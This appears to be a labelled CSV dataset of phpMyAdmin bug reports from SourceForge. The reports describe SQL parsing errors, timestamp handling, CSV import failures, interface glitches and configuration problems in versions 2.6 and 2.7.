"24444","8199","pending) DATEDIFF parse error.
The following query SELECT DATEDIFF 2005 12 25 , 2004 12 25 ) works correctly in the SQL window.
The query SELECT DATEDIFF 2005 12 25 , 2004 12 25 ) FROM Sample does not, even though the same query executes fine from a straight PHP page.
Also, adding our own LIMIT clause makes the query work as well.
Original URL https sourceforge.net p phpmyadmin bugs 1830 https sourceforge.net p phpmyadmin bugs 1830 Original author drdwilcox","bug"
"24444","8200","Update With TIMESTAMP.
When I edit an entry that has a timestamp even if I don t have ON UPDATE CURRENT TIMESTAMPT when it displays the edit screen to modify the entry, it puts in NOW ) for the new value of the TIMESTAMP field.
Example users id int 11) autoincement username char 80) default posted on timestamp default 0000 00 00 00 00 00 Insert a row... 1, thog, 2005 10 10 10 34 00pm now when you modify the row, it puts NOW ) for the posted on field but it should not do that if the person does not have ON UPDATE CURRENT TIMESTAMP enabled...
So if you don t remove it and i wanna change username then it would become... unless i change the NOW ) to the blank entry...
It should just default to the blank entry.
1, newuser, newtime Original URL https sourceforge.net p phpmyadmin bugs 1831 https sourceforge.net p phpmyadmin bugs 1831 Original author thog Found in version 3.3.2","bug"
"24444","8201","Altering ENUM field COLLATION fails wrong query.
I tried to change the collation of an ENUM field, but this information is not in the query Current query ALTER TABLE `base user` CHANGE `user status` `user status` ENUM unconfirmed , confirmed ) NOT NULL DEFAULT unconfirmed ; Expected and working) ALTER TABLE `base user` CHANGE `user status` `user status` ENUM unconfirmed , confirmed ) CHARACTER SET ascii COLLATE ascii general ci NOT NULL DEFAULT unconfirmed ; Original URL https sourceforge.net p phpmyadmin bugs 1845 https sourceforge.net p phpmyadmin bugs 1845 Original author ziegenberg Found in version 2.6.4 pl3","bug"
"24444","8202","Per server themes left frame colors unthemed.
With ThemePerServer enabled, link and text colors in the left frame don t obey the theme.
For example, table names which normally display as white in the Darkblue orange theme are dark blue and thus nearly invisible) when the theme is used for a specific server.
Confirmed in both IE and Firefox.
Original URL https sourceforge.net p phpmyadmin bugs 1833 https sourceforge.net p phpmyadmin bugs 1833 Original author mikeryan Found in version 2.6.4 pl3","bug"
"24444","8203","Not converted mysql message to user language.
Mysql 5.0.15, 4.1.7 phpMyAdmin 2.6.4 my.cnf contain this lines [mysqld] ... language= C Program Files MySQL MySQL Server 4.1 share russian ... after that i have error message in my native language, but phpmyadmin not convert this to chosen language Original URL https sourceforge.net p phpmyadmin bugs 1846 https sourceforge.net p phpmyadmin bugs 1846 Original author grickoff Found in version 2.6.4 pl3","bug"
"24444","8204","Parsed Query produces HTML Encoding tag.
SELECT ups tracking data.id, ups tracking data.created datetime FROM ups tracking data WHERE ups tracking data.created datetime gt;DATE SUB NOW ), INTERVAL 10 DAY) GROUP BY ups tracking data.id ORDER ups tracking data.created datetime ASC produces SELECT ups tracking data.id, ups tracking data.created datetime FROM ups tracking data WHERE ups tracking data.created datetime gt; DATE SUB NOW ) , INTERVAL 10 DAY ) GROUP BY ups tracking data.id ORDER ups tracking data.created datetime ASC LIMIT 0 , 30 which is invalid because you have amp;gt; in the query.
i just updated to the latest pl.
and its not the fist time i got an error like this one.
phpMyAdmin 2.6.4 pl3 MySQL 4.1.14 max Original URL https sourceforge.net p phpmyadmin bugs 1834 https sourceforge.net p phpmyadmin bugs 1834 Original author blu rayne Found in version 2.6.4 pl3","bug"
"24444","8205","Empty table remains enabled when table is empty.
When emptying a database by clicking on the trashcan icon, upon refresh the trashcan remains enabled.
If another database is emptied in this manner, the first database emptied shows the trashcan disabled correctly, but the newly emptied database still displays an enabled trashcan .
The database are emptying correctly, it seems to simply be an interface issue.
Original URL https sourceforge.net p phpmyadmin bugs 1835 https sourceforge.net p phpmyadmin bugs 1835 Original author cryptkeeper Found in version Latest Git","bug"
"24444","8206","port ignored for localhost.
I have 2 MySQL servers running on my machine v4 and v5), both of which run on different ports.
In the config file, if you specify localhost as the port which they both are) then the port is ignored.
Original URL https sourceforge.net p phpmyadmin bugs 1838 https sourceforge.net p phpmyadmin bugs 1838 Original author base10ws Found in version 2.6.4 pl3","bug"
"24444","8207","Empty Mysql message after failure in update.
After sending an INSERT update which I know that already exist in the table the query is rejected as it should) but the explanation of the error does not appear in the response screen.
phpMyAdmin 2.6.4 pl2 and phpMyAdmin 2.6.4 pl3 Version.
This did not happened to me before.phpMyAdmin 2.6.3.rc1 and under.
A made two attachments that shows the conditions before and after the query.
Original URL https sourceforge.net p phpmyadmin bugs 1839 https sourceforge.net p phpmyadmin bugs 1839 Original author yacar suscri","bug"
"24444","8208","index.php W3C errors.
Hi There, the frameset index is not valid.
3 Errors 1) The link element for the favicon is above the head element this is not allowed and has been corrected in the attached file.
2) The left frame has 2 !)
id attributes.
This is also not allowed.
I didn t change anything since I don t know which ID should stay 3) The left and the right frame both use the name and the id attribute.
If both attributes are used they should be equal Use id new) or name old) ?
The id attribute shares the same name space as the name attribute when used for anchor names.
The id attribute can act as more than just an anchor name e.g., style sheet selector, processing identifier, etc.).
Some older user agents don t support anchors created with the id attribute.
The name attribute allows richer anchor names with entities).
Solution Remove one of the both attribute or make the 2 values of ID and NAME equal Sample Define the name=id or just id.
For more information on the ID topic W3C Anchor and ID http www.w3.org TR html4 struct links.html anchors with id W3C ID definition http www.w3.org TR html4 struct global.html adef id With kind regards Andy Original URL https sourceforge.net p phpmyadmin bugs 1854 https sourceforge.net p phpmyadmin bugs 1854 Original author andyscherzinger Found in version Latest Git","bug"
"24444","8209","undefined function pma getservercollation ).
PHP 4.3.10 and php 4.4.0 with Mysql 3.23.58 Get this error when I click DATABASES just after logging in PHP Fatal error Call to undefined function pma getservercollation ) in xxxx xxxx phpMyAdmin 2.7.0 beta1 server databases.php on line 132 Original URL https sourceforge.net p phpmyadmin bugs 1855 https sourceforge.net p phpmyadmin bugs 1855 Original author markpmw Found in version 2.7.0 beta1","bug"
"24444","8210","New docs break PMA showMySQLDocu ).
The manuals downloadable at http dev.mysql.com doc in the one page per chapter flavour have different filenames than they used to have for earlier versions.
This breaks how phpMyAdmin constructs hyperlinks to the manual in functioin PMA showMySQLDocu ).
Please note that simply removing manual from chapter and lower casing the rest is not sufficient!
For example, the help for CREATE DATABASE used to be in manual Reference.html CREATE DATABASE, but is now in sql syntax.html create database, so there have been some restructuring going on.
I hope that this can be fixed in one of the next releases.
I can contribute a patch if I find the time to write one.
Original URL https sourceforge.net p phpmyadmin bugs 1840 https sourceforge.net p phpmyadmin bugs 1840 Original author christl","bug"
"24444","8211","Error messages wrongly formatted..
Some error messages are now formatted in a bit strange way http pma.cihar.com HEAD import.php?import type=server import file= MAX FILE SIZE=2097152 charset of file=utf8 allow interrupt=yes skip queries=0 what=sql Original URL https sourceforge.net p phpmyadmin bugs 1841 https sourceforge.net p phpmyadmin bugs 1841 Original author nijel Found in version Latest Git","bug"
"24444","8212","Wrong URL to error.ico.
Original theme points to themes original img error.ico, however this image is not included.
Original URL https sourceforge.net p phpmyadmin bugs 1842 https sourceforge.net p phpmyadmin bugs 1842 Original author nijel","bug"
"24444","8213","Exporting HTML data to CSV.
I just wants to tell there is the option in phpmyadmin any) to export csv file.
But that is also not working well like if you export csv with html data chose simple csv not CSV for MS Excel option) the Excel file will not be ok.
I am attaching a table with html content data just export it with simply csv option and save it as file.
you will get the bad file.
And there is another error in exporting data in 2.6.4 pl2 Just save it as file in any option Click on Go button).You will get infinite javascript error.
You need to close phpmyadmin.
Thanks you.
Viral Shah Original URL https sourceforge.net p phpmyadmin bugs 1843 https sourceforge.net p phpmyadmin bugs 1843 Original author viral2583 Found in version 2.6.4 pl2","bug"
"24444","8214","Can not delete view.
i have manualy created view, and phpmyadmin thinks it is table.
when i tried to delete it it sent sql query delete table `...`.
i had to send command delete view `...`.
Original URL https sourceforge.net p phpmyadmin bugs 1844 https sourceforge.net p phpmyadmin bugs 1844 Original author ludkosk Found in version 2.6.4 rc1","bug"
"24444","8215","columns can not have empty string as default.
when alter create table a new field does can not have an empty string as default value also in table structure view there is no difference between an empty string as default or no default set at all Original URL https sourceforge.net p phpmyadmin bugs 1847 https sourceforge.net p phpmyadmin bugs 1847 Original author cybot tm Found in version 2.6.4 pl3","bug"
"24444","8216","Validate SQL displayed as Refresh.
Validate SQL and Skip Validate SQL links are displayed as Refresh links.
Please find the attached screenshot.
Original URL https sourceforge.net p phpmyadmin bugs 1848 https sourceforge.net p phpmyadmin bugs 1848 Original author arpan jain Found in version 2.6.4 pl3","bug"
"24444","8217","SQL and actions bellow should be same width.
SQL and actions bellow should be forced to same width, otherwise in same places you will get broken layout.
Example screenshot attached.
Original URL https sourceforge.net p phpmyadmin bugs 1849 https sourceforge.net p phpmyadmin bugs 1849 Original author nijel Found in version Latest Git","bug"
"24444","8218","after droping db some links are missing.
create db drop db gt; missing links variables, runtime, rights, .... also, possible after droping a db we should lead to another page ... server databases or server sql?
Original URL https sourceforge.net p phpmyadmin bugs 1850 https sourceforge.net p phpmyadmin bugs 1850 Original author cybot tm Found in version 2.6.4 pl3","bug"
"24444","8219","MySQL )Bug in Server Statistics.
Mysql s statistic for bytes send received consists of an ulong type which can contain max 2 32 bytes.
On a busy database server this value will overrun after several hours or some days.
Phpmyadmin displays the server statistics in the form bytes received bytes send) 3600 server uptime which leads to totally wrong results after the first overrun in one of the two counters.
This bug cannot be fixed since the number of overruns in both counters is not known.
As a conclusion the statistic cannot be trusted.
Kind regards, Andreas Original URL https sourceforge.net p phpmyadmin bugs 1851 https sourceforge.net p phpmyadmin bugs 1851 Original author scherbaum Found in version 2.6.4 pl3","bug"
"24444","8220","common.lib.php unsets cfg[ Servers ].
I stumbled over this when I configured 2 servers in cfg[ Servers ] but was only presented 1 in the frontend.
in libraries common.lib.php it says cut include .
config.default.php ; Remember default server config default server = cfg[ Servers ][1]; Drop all server, as they have to be configured by user unset cfg[ Servers ]); cut I guess the unset ) call was supposed to appear before the include directive?
Original URL https sourceforge.net p phpmyadmin bugs 1866 https sourceforge.net p phpmyadmin bugs 1866 Original author ndabezitha Found in version 2.7.0 rc1","bug"
"24444","8221","mismatch between PMA and MySQL for ENGINE and TYPE.
german translation for ENGINE with currently Typ is confusing, as TABLE TYPE is not the same as ENGINE TABLE TYPE or TYPE means VIEW, BASE TABLE or SYSTEM VIEW, ... ENGINE means InnoDB, MyISAM, BDB, ...
Original URL https sourceforge.net p phpmyadmin bugs 1852 https sourceforge.net p phpmyadmin bugs 1852 Original author cybot tm","bug"
"24444","8222","Broken Link in Structure Tab.
On the Structure tab of any database.
The ?
icon next to Indexes is linked to http dev.mysql.com doc mysql en Optimising Database Structure.html This produces a File not found on the mysql website.
Original URL https sourceforge.net p phpmyadmin bugs 1853 https sourceforge.net p phpmyadmin bugs 1853 Original author cyberdog3k Found in version 2.6.4 pl3","bug"
"24444","8223","won t run without sessions compiled into PHP.
I am using PHP 5.0.5 which I compiled myself, without session support, as I don t need it.
pma 2.6.4 pl1 works well here, but pma 2.7.0 b1 not, guess because pma didn t use sessions back then.
Call to undefined function session name ) in usr home phpMyAdmin 2.7.0 beta1 libraries session.inc.php on line 47 The screen just stays white, so either include some warning message if sessions aren t available, in order to make people like me not wonder why pma won t work at all, or better, try to implement some own minimal) session management, so that people who are stuck on a PHP install without session management compiled in and without the possibility to re compile PHP with sessions, to use pma.
Original URL https sourceforge.net p phpmyadmin bugs 1856 https sourceforge.net p phpmyadmin bugs 1856 Original author ci dev Found in version 2.7.0 beta1","bug"
"24444","8224","Selecting users to drop broken.
On privileges page, selecting users using lt;label gt; tags doesn t work because all checkboxes have same id.
Original URL https sourceforge.net p phpmyadmin bugs 1857 https sourceforge.net p phpmyadmin bugs 1857 Original author nijel Found in version Latest Git","bug"
"24444","8225","Table Column privileges brokeness new in HEAD.
While editing user privileges I get following errors in database privileges Notice Undefined index Table priv in pma server privileges.php on line 1688 Notice Undefined index Column priv in pma server privileges.php on line 1688 Original URL https sourceforge.net p phpmyadmin bugs 1858 https sourceforge.net p phpmyadmin bugs 1858 Original author nijel Found in version Latest Git","bug"
"24444","8226","Problem with escaping underscores.
There s a problem when underscores are escaped and written to the mysql.db table.
When stored procedures are executed and the database names in the proc and db table don t fit together because one has escaped underscores and the other not, the procedure can t be executed.
The complete issue is described here http bugs.mysql.com bug.php?id=14834 Original URL https sourceforge.net p phpmyadmin bugs 1859 https sourceforge.net p phpmyadmin bugs 1859 Original author mpopp75 Found in version 2.6.4 pl3","bug"
"24444","8227","f does not list field names.
PHP version 5.0.5 File config.inc.php cfg[ DefaultQueryTable ] = SELECT f FROM t ; will display something like this SELECT `Array`, `Array`, `Array` FROM `table1` instead of SELECT `col1`, `col2`, `col3` FROM `table1` Original URL https sourceforge.net p phpmyadmin bugs 1860 https sourceforge.net p phpmyadmin bugs 1860 Original author friend al 23 Found in version 2.7.0 beta1","bug"
"24444","8228","MySQL 1267 Illegal mix of collations > diff.
con.
collati.
=Explaination= When I try to perform a query with FIND IN SET command in the WHERE syntax, I get a MySQL error code of 1267.
There is no explaination of the error code provided by phpMyAdmin.
The query works on the CLI and works without the FIND IN SET command.
This query worked on my previous installed version of phpmyadmin.2.5.7.
=Setup= mysql standard 4.1.14 php 5.0.5 Solaris =Test Case= Sample data CREATE TABLE `testcase` `id` INT NOT NULL AUTO INCREMENT PRIMARY KEY , `test field` SET VALUE1 , VALUE2 ) NULL ) TYPE = innodb; INSERT INTO `testcase` VALUES 1, VALUE1 ); INSERT INTO `testcase` VALUES 2, VALUE2 ); INSERT INTO `testcase` VALUES 3, VALUE1,VALUE2 ); INSERT INTO `testcase` VALUES 4, VALUE1 ); Sample query SELECT FROM testcase WHERE FIND IN SET VALUE1 , test field ) gt;0 Expected result works on CLI) | id | test field | | 1 | VALUE1 | | 3 | VALUE1,VALUE2 | | 4 | VALUE1 | Actual result Error SQL query Documentation SELECT FROM testcase WHERE FIND IN SET VALUE1 , test field ) gt;0 LIMIT 0 , 30 MySQL said Documentation 1267 Original URL https sourceforge.net p phpmyadmin bugs 1861 https sourceforge.net p phpmyadmin bugs 1861 Original author rlorenzo Found in version 2.7.0 beta1","bug"
"24444","8229","Unable to set index in first creating column.
it is impossible to establish radio for type index on the first column at creation of the table Opera 8.5, IE6.0 Original URL https sourceforge.net p phpmyadmin bugs 1862 https sourceforge.net p phpmyadmin bugs 1862 Original author grickoff","bug"
"24444","8230","File server databases.php shows undefined function error.
The file server databases.php shows this php error Fatal error Call to undefined function pma getservercollation ) in Library WebServer Documents phpMyAdmin 2.7.0 beta1 server databases.php on line 132 I tried to reach this page from the mainpage Database link.
I m using 2.7.0 beta1 without any changes.
Original URL https sourceforge.net p phpmyadmin bugs 1863 https sourceforge.net p phpmyadmin bugs 1863 Original author rudi s Found in version 2.7.0 beta1","bug"
"24444","8231","index.php <noframe>.
another small bug the tag is lt;noframe gt; NOT lt;noframes gt; tested with MultiZilla) BTW phpMyAdmin is more friendly with a frames capable browser.
should be phpMyAdmin is only working with a frames capable browser.
Original URL https sourceforge.net p phpmyadmin bugs 1864 https sourceforge.net p phpmyadmin bugs 1864 Original author windkiel","bug"
"24444","8232","verbose hostname not escaped on front page.
Entering a value in the config file like cfg[ Servers ][ i][ verbose ] = lt;span style= color red gt;servername lt; span gt; ; generates servername in red text on the front page, but generates lt;span style= color red gt;servername lt; span gt; on other pages.
For security I think the second behaviour is probably more correct.
Original URL https sourceforge.net p phpmyadmin bugs 1865 https sourceforge.net p phpmyadmin bugs 1865 Original author ajcartmell Found in version 2.7.0 rc1","bug"
"24444","8233","Import problems.
1\.
When loading SQL file receive You didn t enter any data to import!
File imports normal in command line and SQL window.
2\.
Importing this CSV file 1;1;;8356;4440 2;1;a;8309;4469 without Enclosing of fields is optional going to 100 utilize apache server and page timeouts.
Original URL https sourceforge.net p phpmyadmin bugs 1867 https sourceforge.net p phpmyadmin bugs 1867 Original author valio bg Found in version 2.7.0 rc1","bug"
"24444","8234","links in left column opens it in a new window.
After selecting a database you get list of tables on the left side.
With Firefox 1.5RC3 clicking on a table name new window pops up instead of table info being displayed in a frame on a right.
This also happens with new profile so it has nothing to do with extensions.
Windows XP Original URL https sourceforge.net p phpmyadmin bugs 1868 https sourceforge.net p phpmyadmin bugs 1868 Original author mdonatas Found in version 2.7.0 rc1","bug"
"24444","8235","Error about missing config.
This does not apply to QA 2 7 0 branch, only HEAD.
Current code shows error about missing config, even when everything works http pma.cihar.com HEAD Original URL https sourceforge.net p phpmyadmin bugs 1869 https sourceforge.net p phpmyadmin bugs 1869 Original author nijel Found in version Latest Git","bug"
"24444","8236","As of 2.7.x JScript Errors All the Time.
Since 2.7.x I get this error in my Firefox Javascript console Error myTooltipContainer has no properties Source File http localhost phpmyadmin libraries tooltip.js Line 132 I run firefox version 1.0.7 and Apache 1.3 Mysql 4.1 altho this is irrelevant) I will attempt to debug the javascript if you would like, Im quite handy with front end scripting ) Post a response if you would like a more thorough bug report.
Thanks for a great web app Mafro Original URL https sourceforge.net p phpmyadmin bugs 1870 https sourceforge.net p phpmyadmin bugs 1870 Original author mafrosis Found in version 2.7.0 rc1","bug"
"24444","8237","Do not overwrite this query checkbox.
has no effect.
Original URL https sourceforge.net p phpmyadmin bugs 1871 https sourceforge.net p phpmyadmin bugs 1871 Original author lem9","bug"
"24444","8238","config missing, non user friendly error.
If you rename move config.default.php to another filename, you get a big long error message...
Warning main .
config.default.php) [function.main] failed to open stream No such file or directory in usr share phpmyadmin libraries common.lib.php on line 84 Warning main ) [function.include] Failed opening .
config.default.php for inclusion include path= .
etc php usr local share php5.0 usr local share php5 usr local share php usr share php5.0 usr share php5 usr share php ) in usr share phpmyadmin libraries common.lib.php on line 84 I recall that there used to be friendlier messages in 2.6...
Original URL https sourceforge.net p phpmyadmin bugs 1872 https sourceforge.net p phpmyadmin bugs 1872 Original author f fr3d Found in version 2.7.0 rc1","bug"
"24444","8239","abc cba > abc cba.
if Database name is eg.
abc cba then in privileges in some place this Database name has showed as abc\ cba i have MySQL ver.
4.0.24 Original URL https sourceforge.net p phpmyadmin bugs 1873 https sourceforge.net p phpmyadmin bugs 1873 Original author sulucilus Found in version 2.7.0 rc1","bug"
"24444","8240","different number of record from mysql console and phpMyAdmin.
The next query, submit from mysql console return 242 records select distinct ID WPO OLD PRC,TBL ORDINE.ORD NUM from mio left join TBL ORDINE on ID WPO OLD PRC=CEF NUM order by TBL ORDINE.ORD NUM,ID WPO OLD PRC submit from phpMyAdmin return 175 records.
I used in mysql console and in phpMyAdmin the same user.
Mysql version 3.23.58 PHP version 4.3.1 Linux RedHat 2.1 AS I have this problem with phpMyAdmin 2.5.7 pl1 phpMyAdmin 2.6.4 pl4 phpMyAdmin 2.7.0 rc1 Original URL https sourceforge.net p phpmyadmin bugs 1874 https sourceforge.net p phpmyadmin bugs 1874 Original author m molinaro Found in version 2.7.0 rc1","bug"
"24444","8241","CSV Import Broken.
CSV Import seems broken in 2.7.0 RC 1.
Two issues 1) I cannot enter \t in the Fields Terminated box it only allows a single character 2) If I set that as the default in config.inc.php, when I try to upload a text file, it says that it was successful, but no data is added to the database.
Here are my import settings cfg[ Import ][ csv replace ] = FALSE; cfg[ Import ][ csv terminated ] = \t ; cfg[ Import ][ csv enclosed ] = ; cfg[ Import ][ csv enclosed optionally ] = TRUE; cfg[ Import ][ csv escaped ] = ; cfg[ Import ][ csv new line ] = \r ; cfg[ Import ][ csv columns ] = ; I am trying to upload a file created on MacOS X. Upload in this way has always worked for me in the past, as I regularly upload data from CSV files.
Using MySQL 5.0.16, Safari Browser 2.0.2.
Original URL https sourceforge.net p phpmyadmin bugs 1884 https sourceforge.net p phpmyadmin bugs 1884 Original author rrmartin Found in version 2.7.0 pl2","bug"
"24444","8242","Incorrect handling of CURRENT TIMESTAMP.
phpMyAdmin seems to have problems with handling timestamp fields when the attribute ON UPDATE CURRENT TIMESTAMP is not set.
When adding a new column, the default value for the filed is CURRENT TIMESTAMP , which is interpreted by phpMyAdmin as a string and results in an MySQL error.
Configuration phpMyAdmin 2.7.0 rc1 MySQL 5.0.15 nt running under Windows XP Pro SP 2 German) Stepps to reproduce Create Table CREATE TABLE `pma test` `id` int 10) unsigned NOT NULL auto increment, `value` varchar 50) collate latin1 german2 ci NOT NULL, `timestamp` timestamp NOT NULL default CURRENT TIMESTAMP, PRIMARY KEY `id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1 german2 ci AUTO INCREMENT=1 ; Insert new record with phpMyAdmin Leave id empty, set value to e.g.
pma and levea timestamp unchanged CURRENT TIMESTAMP).
This query will fail with SQL query INSERT INTO `pma test` `id` , `value` , `timestamp` ) VALUES NULL , pma , CURRENT TIMESTAMP ) MySQL said 1292 Incorrect datetime value CURRENT TIMESTAMP for column timestamp at row 1 Original URL https sourceforge.net p phpmyadmin bugs 1875 https sourceforge.net p phpmyadmin bugs 1875 Original author pkordowich Found in version 2.7.0 rc1","bug"
"24444","8243","wrong parameter count for strspn ).
I have upgraded from 2.6.4 where everything works well) to 2.7.0 rc1.
I have just copied the config.inc.php from the previous version into 2.7.0 rc1 and now the following error occures when I try to browse a table Warning wrong parameter count for strspn ) in libaries sqlparser.lib.php on line 399 Original URL https sourceforge.net p phpmyadmin bugs 1876 https sourceforge.net p phpmyadmin bugs 1876 Original author fuzzysh Found in version 2.7.0 rc1","bug"
"24444","8244","Error on first visit.
When you visit phpMyAdmin without config.inc.php for first time, you get this error Warning phpMyAdmin ERROR unkown configuration source .
config.inc.php in srv pma HEAD libraries Config.class.php on line 342 Original URL https sourceforge.net p phpmyadmin bugs 1877 https sourceforge.net p phpmyadmin bugs 1877 Original author nijel Found in version Latest Git","bug"
"24444","8245","Session cookie should have path.
Session cookie is set for server root, however it should use same path as other cookies.
Original URL https sourceforge.net p phpmyadmin bugs 1878 https sourceforge.net p phpmyadmin bugs 1878 Original author nijel Found in version Latest Git","bug"
"24444","8246","Array to string conversion.
Happens on server status.php Notice Array to string conversion in srv pma HEAD libraries grab globals.lib.php on line 195 URL http pma.cihar.com HEAD server status.php Original URL https sourceforge.net p phpmyadmin bugs 1879 https sourceforge.net p phpmyadmin bugs 1879 Original author nijel Found in version Latest Git","bug"
"24444","8247","Messed layout on import.
Import has messy layout for file to import fieldset.
Original URL https sourceforge.net p phpmyadmin bugs 1880 https sourceforge.net p phpmyadmin bugs 1880 Original author nijel Found in version Latest Git","bug"
"24444","8248","Changing theme does not change left logo.
After changing theme to darkblue orange, left logo still stays on original version.
Original URL https sourceforge.net p phpmyadmin bugs 1881 https sourceforge.net p phpmyadmin bugs 1881 Original author nijel Found in version Latest Git","bug"
"24444","8249","Table mydatabase.pma column info doesn t exist.
i have setup pmadb to phpmyadmin and my own database is mydatabase when select from mytable error 1146 Table mydatabase.pma column info doesn t exist MySQL client version 4.1.13 Used PHP extensions mysql php v PHP 4.4.1 dev proof a. mysql pconnect ) arguments for both is controluser=true false is exacatly same b. resource that mysql pconnect ) returns is NOT same therefore the test if controllink == GLOBALS[ userlink ]) in relation.lib.php is wrong Original URL https sourceforge.net p phpmyadmin bugs 1882 https sourceforge.net p phpmyadmin bugs 1882 Original author xuefer Found in version Latest Git","bug"
"24444","8250","Doesn t seem to be reading config.inc.php anymore.
I have been running the CVS builds for a while now, doing CVS updates usually in the morning.
Yesterday phpMyAdmin was working just fine, but after doing a CVS update this morning 1 Dec 05), I end up getting an Access denied error and 1045 Access denied for user root localhost Using password NO) My config.ini.php hasn t changed at all, and is set up for cookie authentication.
Tried deleting everything and checking out a fresh copy from CVS, but still the same result.
Original URL https sourceforge.net p phpmyadmin bugs 1883 https sourceforge.net p phpmyadmin bugs 1883 Original author imabug Found in version Latest Git","bug"
"24444","8251","call to undefined pma dbi try query ) .
Hi, working a bit with the rc1 I experienced the following error Fatal error Call to undefined function pma dbi try query ) in home phpadmin www phpMyAdmin.new libraries check user privileges.lib.php on line 16 What I did was execute search and selecting a row for editing on the next page there was this error and phpMyAdmin did not show the edit dialog.
I haven t tracked this down yet sorry) but maybe you folks already got a clue where that might result from.
Haven t seen it in earlier versions, though it might have existed and I never ran into that special case or so.
Original URL https sourceforge.net p phpmyadmin bugs 1885 https sourceforge.net p phpmyadmin bugs 1885 Original author neufeind Found in version 2.7.0 pl2","bug"
"24444","8252","Problem on editing information schema table.
I execute this SQL command.
SELECT FROM `COLUMNS` ORDER BY `TABLE SCHEMA` DESC LIMIT 0 , 30 Then I edit one record.
The result page produce this error shown below lt;link rel= stylesheet type= text css href= .
css phpmyadmin.css.php?
Fatal error Call to undefined function pma generate common url ) in C \Program Files\xampp\phpMyAdmin\libraries\header meta style.inc.
php on line 44 Original URL https sourceforge.net p phpmyadmin bugs 1886 https sourceforge.net p phpmyadmin bugs 1886 Original author doggy8088 Found in version 2.7.0","bug"
"24444","8253","CVS import still broken in 2.7.0.
Please see bug 1371249.
It only seems partially fixed.
It is still not possible in 2.7.0 to use field separator chars like \t, \r as the text boxes still only allow the input of one character, both with CSV and CSV using LOAD DATA options.
In detail fields escaped by allows only one char to be typed not \t etc) fields terminated by allows only one char.
lines terminated by allows more than one char and seems OK This bug is a real show stopper for me as I regularly use phpmyadmin to upload CSV data into my databases.
Also, the possibility of optionally having fields enclosed by seems to have gone.
That was very useful for idiotic programs like MS Excel which insist on enclosing fields in even when you do not ask for it.
Original URL https sourceforge.net p phpmyadmin bugs 1887 https sourceforge.net p phpmyadmin bugs 1887 Original author rrmartin","bug"
"24444","8254","auto increment is not written on export to mysql323 mysql40.
when exporting a mysql 5.x database with sql export compatibility settings for mysql323 od mysql40 the value for auto increment is not exported.
example export setting mysql40 CREATE TABLE `test` `id` int 11) NOT NULL, ... export setting none CREATE TABLE `ltt ensemble` `id` int 11) NOT NULL auto increment, ...
Original URL https sourceforge.net p phpmyadmin bugs 1888 https sourceforge.net p phpmyadmin bugs 1888 Original author cmartin1970 Found in version 2.7.0","bug"
"24444","8255","CSV import hangs.
Having applied the fix mentioned for the earlier import bug unable to specify escaped characters \r and \t for record and field spearators), I have now hit a new problem.
With settings as follows CSV options Fields terminated by \t Fields enclosed by Fields escaped by \ Lines terminated by \r Column names and trying to import a small text file 60kb), phpmyadmin just hangs after several minutes of wating I cancelled the upload; no data was added to the database.
In 2.6.x etc such a file would have uploaded in a few seconds.
File can be supplied on request.
Original URL https sourceforge.net p phpmyadmin bugs 1889 https sourceforge.net p phpmyadmin bugs 1889 Original author rrmartin Found in version 2.7.0","bug"
"24444","8256","Invalid Table selected on db change.
If I do access the table structure view , and after this I select another database from left frames combobox, the table name of the table structure view s table is passed to db details structure.php call of the new database.
Original URL https sourceforge.net p phpmyadmin bugs 1899 https sourceforge.net p phpmyadmin bugs 1899 Original author zotteltier de Found in version 2.7.0 pl1","bug"
"24444","8257","Missing Show Tables shortcut in left frame.
I just upgraded to 2.7.0 from 2.6.4.
I noticed that the show tables link with the database name) shortcut in the left frame was missing when using the light menu select database dropdown) and it doesn t appear that there is any configuration to display it.
I rather liked that shortcut and I used it often.
Why was it deleted?
Original URL https sourceforge.net p phpmyadmin bugs 1890 https sourceforge.net p phpmyadmin bugs 1890 Original author luegner Found in version 2.7.0","bug"
"24444","8258","Links in left frame open in new window.
I have experienced a problem that when i click on a link in the main nav bar in the left frame Home, Logout, etc.)
everything opens in a new window.
This is caused by The main frameset [CODE] lt;frameset cols= 180, rows= id= mainFrameset gt; lt;frame frameborder= 0 id= leftFrame src= left.php name= nav1133862421 gt; lt;frame frameborder= 0 id= rightFrame src= main.php name= phpmain1133862421 gt; lt;noframes gt; lt;body gt; lt;p gt;phpMyAdmin arbeitet besser mit einem lt;b gt;Frame lt; b gt; fxc3xa4higen Browser.
lt; p gt; lt; body gt; lt; noframes gt; lt; frameset gt; [ CODE] The target definition however points to a frame called phpmain missing the timestamp or whatever it is in the frameset def didnt check the code ).
This happens on all ?!?)
links in the nav frame, and obviously) with all browsers ...
Original URL https sourceforge.net p phpmyadmin bugs 1891 https sourceforge.net p phpmyadmin bugs 1891 Original author etherius Found in version 2.7.0","bug"
"24444","8259","Sorting of Tables.
The tables in the navigation frame were sorted in a different order then the tables in the database view.
It seems to be, that tables starting with capital letters were preferred in sorting, in the navigation frame.
Original URL https sourceforge.net p phpmyadmin bugs 1892 https sourceforge.net p phpmyadmin bugs 1892 Original author garl Found in version 2.7.0","bug"
"24444","8260","force https confiv variable typo?.
I noticed in the Id config.default.php,v 1.3 2005 12 06 12 05 26 nijel Exp version of config.default.php, the config variable to force https connections reads cfg[ ForceSLL ] = FALSE; whether to force using https Should it be ForceSSL instead?
Unless of course ForceSLL has been used all along and changing it would break things horribly.
Original URL https sourceforge.net p phpmyadmin bugs 1893 https sourceforge.net p phpmyadmin bugs 1893 Original author imabug Found in version Latest Git","bug"
"24444","8261","Bug on adding new field.
When I m trying to add new field or modify existing, I get too many VARBINARY items at the end of type dropdown.
Original URL https sourceforge.net p phpmyadmin bugs 1894 https sourceforge.net p phpmyadmin bugs 1894 Original author nullevent Found in version Latest Git","bug"
"24444","8262","Error in javascript history.
when pressing history i get this errors Warning htmlspecialchars ) expects parameter 1 to be string, array given in var www html phpMyAdmin 2.7.0 querywindow.php on line 340 Warning htmlspecialchars ) expects parameter 1 to be string, array given in var www html phpMyAdmin 2.7.0 querywindow.php on line 342 Original URL https sourceforge.net p phpmyadmin bugs 1895 https sourceforge.net p phpmyadmin bugs 1895 Original author isotop Found in version 2.7.0","bug"
"24444","8263","Language change on login panel not propagated.
A change of Language on the login panel is done for the login panel only, not on the subsequent pages.
Original URL https sourceforge.net p phpmyadmin bugs 1896 https sourceforge.net p phpmyadmin bugs 1896 Original author lem9 Found in version 2.7.0","bug"
"24444","8264","id and name attribute value mismatch.
